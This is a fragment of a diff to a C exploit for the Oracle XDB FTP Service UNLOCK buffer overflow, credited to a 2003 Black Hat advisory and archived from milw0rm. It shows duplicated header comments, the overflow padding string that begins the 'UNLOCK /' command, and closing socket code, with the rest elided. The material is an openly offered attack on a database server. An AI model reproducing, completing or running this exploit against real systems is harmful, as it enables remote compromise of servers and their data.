/* */
/* Original Advisory : */
/* http://www.blackhat.com/presentations/bh-usa-03/bh- */
/* us-03-litchfield-paper.pdf */
/* Oracle XDB FTP Service UNLOCK Buffer Overflow Exploit */
/* David Litchfield from ngssoftware (at Blackhat 2003)*/
/* */
/* Original Advisory : */
/* http://www.blackhat.com/presentations/bh-usa-03/bh- */
/* us-03-litchfield-paper.pdf */
#include <stdio.h>
@ -56,8 +56,7 @@ unsigned char exploit[508]=
char exploit_code[8000]=
"UNLOCK / aaaabbbbccccddddeeeeffffgggghhhhiiiijjjjkkkkllllmmmmnnn"
"nooooppppqqqqrrrrssssttttuuuuvvvvwwwwxxxxyyyyzzzzAAAAAABBBBCCCCD"
"DDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSS
T"
"DDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSST"
"TTTUUUUVVVVWWWWXXXXYYYYZZZZabcdefghijklmnopqrstuvwxyzABCDEFGHIJK"
"LMNOPQRSTUVWXYZ0000999988887777666655554444333322221111098765432"
"1aaaabbbbcc";
@ -196,4 +195,4 @@ closesocket(sock);
return 0;
}
// milw0rm.com [2003-08-13]
// milw0rm.com [2003-08-13]